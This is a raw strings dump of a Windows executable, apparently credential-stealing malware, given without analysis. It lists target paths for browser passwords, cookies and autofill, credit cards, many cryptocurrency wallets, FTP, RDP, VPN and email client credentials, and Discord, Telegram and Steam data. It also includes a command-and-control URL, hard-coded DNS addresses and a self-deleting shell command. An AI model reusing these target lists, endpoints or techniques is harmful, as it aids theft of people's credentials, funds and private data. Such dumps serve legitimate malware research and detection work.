!This program cannot be run in DOS mode.
2.RichN
`.data
.reloc
expand 32-byte k
|$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
%s = %s
mpr.dll
crypt32.dll
urlmon.dll
userenv.dll
shlwapi.dll
ole32.dll
oleaut32.dll
gdiplus.dll
gdi32.dll
netapi32.dll
dnsapi.dll
advapi32.dll
shell32.dll
user32.dll
ws2_32.dll
winhttp.dll
wininet.dll
%ComSpec%
__GRABBER__
__DELIMM__
FFFILEE
SYSINFORMATION
IMPAUTOFILL_DATA
CREDIT_CARD
CRED_DATA
Active Directory Domain: %s
Software:
Layouts:
LT: %s (UTC %d:%d)
PC: %s
User: %s
Screen: %dx%d
RAM: %d MB
CPU: %s (%d cores)
IP: %s
MachineGuid: %S
%d-%02d-%02d %02d:%02d:%02d
/c ping 127.0.0.1 && del "%s"
*.config
*.wallet
%NETWORK%
%FULLDISK%
Grabber
Trinity\trinity.realm
scatter
Ledger Live\app.json
Exodus
com.liberty.jaxx\IndexedDB
Jaxx\Local Storage\leveldb
strDataDir
Namecoin
Electrum
Ethereum
.wallet
keystore
Crypto
wallet.dat
wallet_path
monero-project
storages.txt
https://%S/r/%S
https://%S/a/%S
http%s://%s%S
http://%s
Host: %s
Content-Type: application/octet-stream
Content-Encoding: binary
Host: %s
Content-Type: application/x-www-form-urlencoded
Host: %s
%s?id=%S
%S %s HTTP/1.1
%SContent-Length: %d
bdns.%s
dotbit.me
185.121.177.53;169.239.202.202;
encrypted_key
os_crypt
Local State
Web Data
History
%s\key%d.db
key4.db
key3.db
encryptedPassword
encryptedUsername
logins
cookies.sqlite
signons.sqlite
formhistory.sqlite
webappsstore.sqlite
places.sqlite
Normal|%s|%s|%02d/%04d|%s
Masked|%s|%02d/%04d|%s|%s|%s
Visits count: %d
Last visit: [%d-%02d-%02d %02d:%02d:%02d]
Browsers\History\%s.txt
Browsers\Autofill\%s.txt
Browsers\Cookies\%s.txt
%s\%S.json
Login Data
wininet
Cookies
Internet Explorer
encoding
connections
UserName
HostName
0123456789ABCDEF
SmartFTP\Client 2.0\Favorites
GHISLER\wcx_ftp.ini
ixKZ-<
Ipswitch\WS_FTP\Sites\ws_ftp.ini
FileZilla
sitemanager
recentservers
abe2869f-9b47-4cd9-a358-c22904dba7f7
Microsoft_WinInet_*
vaultcli.dll
pstorec.dll
Software\EarthVPN
Software\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Internet Account Manager\Accounts
Software\Microsoft\Office\%d.0\Outlook\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Windows NT\CurrentVersion
Windows\CurrentVersion\Uninstall
Internet Explorer\TypedURLs
Internet Explorer\IntelliForms\Storage2
Martin Prikryl\WinSCP 2\Sessions
Store Root
MachineGuid
{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1
DisplayVersion
DisplayName
DisplayIcon
ProductName
InstallPath
Cryptography
Microsoft
Software
accounts.xml
%s\.purple\%s
profiles
account*.oeaccount
KdfIterations
mRemoteNG\confCons.xml
\tdata\
.config
Discord\Local Storage\leveldb
loginusers
Telegram
Valve\Steam
ProhibitDTD
user.config
setting[@name='%s']
NordVPN
EarthVPN
DPAPI:
Password
Username
Hostname
Domain
Protocol
screenshot_%d.png
screenshot.png
%08lX%04lX%lu
config
password 51:b:
username:s:
full address:s:
4|mRemoteNG %s|%s|%s|%S|
1|FileZilla|%s:%s|%s|%S|
1|WS_FTP|%s|%s|%S|
1|WinSCP|%s|%s|%s|
1|TotalCommander|%s|%s|%s|
4|Remote Desktop|%s|%s|%s|
3|Pidgin|%s|%s|%s|
3|Psi(+)|%s|%s|%s|
2|EarthVPN||%s|%s|
2|NordVPN||%s|%s|
0|%s|%S|%s|%s|%s
0|%S|%s|%s|%s|%S
0|%s|%s|%s|%s|
5|Outlook|%s:%d|%s|%s|
5|Windows Mail|%s|%s|%s|
l4uadEfLpWKM
3mcogHY3yQNyiUaK
https://donattelli.com/test/php/api.php;
OS: %S x%d
%s(%S)
.bazar
fce4902a-54a9-4543-b5d9-04db464e02dd
8v.j@X+E
YYj8X+E
?vdj@X+E
h^IuAj
GetProcessHeap
KERNEL32.dll
LsaQueryInformationPolicy
LsaOpenPolicy
LsaClose
LsaFreeMemory
ADVAPI32.dll
soft.dll
Install
__DllMainCRTStartup@12
User32
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>L>T>\>d>l>t>|>
?$?,?4?<?D?L?T?\?d?l?t?|?
0$0,040<0D0L0T0\0d0l0t0|0
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3
>%>,>5><>H>N>U>Z>`>g>n>}>
?.?;?E?L?W?m?z?
515[5r5
5!6>6J6d6y6
7!7N7_7
879H9`:e:
5/5F5Y5h5
6T6c6s6
7T7v7{7
848=8_8x8
:5:L:p:
:T;Y;h;{;
?-?A?U?i?}?
010E0Y0m0
1!151I1]1q1
2%292M2a2u2
3)3=3Q3e3y3
4-4A4U4i4}4
515E5Y5m5
6!656I6]6q6
7%797M7a7u7
8)8=8Q8e8y8
9'959C9Q9_9s9
:':;:O:c:w:
;);=;Q;_;m;
<#=L=u=
7-7:7J7\7g708F8^8y8
9!999T9l9
: :8:S:k:
=)=;=M=m=
>+>=>O>o>
?-???Q?q?
0"040F0X0x0
1 171O1g1
2 272W2o2
=!=<=J>Q>a>q>
?&?6?F?V?f?
0 000@0
=o?s?w?{?
3'343>3M3
6'7R7z7
:%;K;n;
;X<{<==K=h>
C0^0w0
<-=;=T=o=
? ?v?~?
2<475r5
666]6i6
70767R7y7
7+909<9B9
0 1N1T1v1
445>5y5
3{4!5r7
97<C<I<Z<
:?<f=w=
8*979W9]9e9k9
:":*:0:L:Z:
041#2r2
2_3k3w3
9$:c:w:
;.;B;x;
=$=+=2=9=@=G=N=2?
767U7d7}7
989M9\9
<6=@=J=T=`>l>
? ?/?5?A?
8l9y9D:
:D<L<T<^<A>
?1?<?M?^?
5U5l5x5
=m>#?L?
0$0(0,000
%08x.%s
%s\%s\%s
%s\%s\%.6ss
%s\%s\%s-Qt
%s\%s\%s\%s
monero-wallet-gui.exe
monerod.exe
Monero\wallets
%s\%s.json
*.mmd*
atomic\Local Storage\leveldb
Guarda\Local Storage\leveldb
simpleos\Local Storage\leveldb
Neon\Local Storage\leveldb
WalletWasabi\Client\Wallets
MyMonero
%s\%s\%s.xml
\\?\%s
\\?\%c:
%S\%S\%s
WinAuth\winauth.xml
%s\WinAuth\winauth.xml
Authy Desktop\Local Storage\leveldb
SMTP Server
SMTP Port
SMTP User
SMTP Password
IMAP Server
IMAP Port
IMAP User
IMAP Password
POP3 Server
POP3 Port
POP3 User
POP3 Password
IMAP_Server
IMAP_User_Name
IMAP_Password2
POP3_Server
POP3_User_Name
POP3_Password2
%s\%s\%s.vdf
%s\%s.vdf
Comment: %ls
Data:
%2.2X
%-50s %s
jjjjjj
jjjjjj
jjjjjj